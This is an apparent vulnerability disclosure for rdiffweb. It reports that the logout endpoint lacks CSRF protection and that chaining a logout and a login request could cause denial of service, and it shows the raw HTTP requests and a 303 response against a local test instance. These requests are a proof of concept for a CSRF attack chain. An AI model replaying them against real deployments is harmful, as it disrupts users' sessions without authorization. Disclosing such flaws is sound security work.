we haven’t csrf token in logout basically this is not really issue but in rdiffweb we have logically redirect user to last source like logout method.
in this case attacker can chain two request(logout,login) that lead to dos
GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
login=admin&password=admin123&submit=Sign+in
response like that
HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close
This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.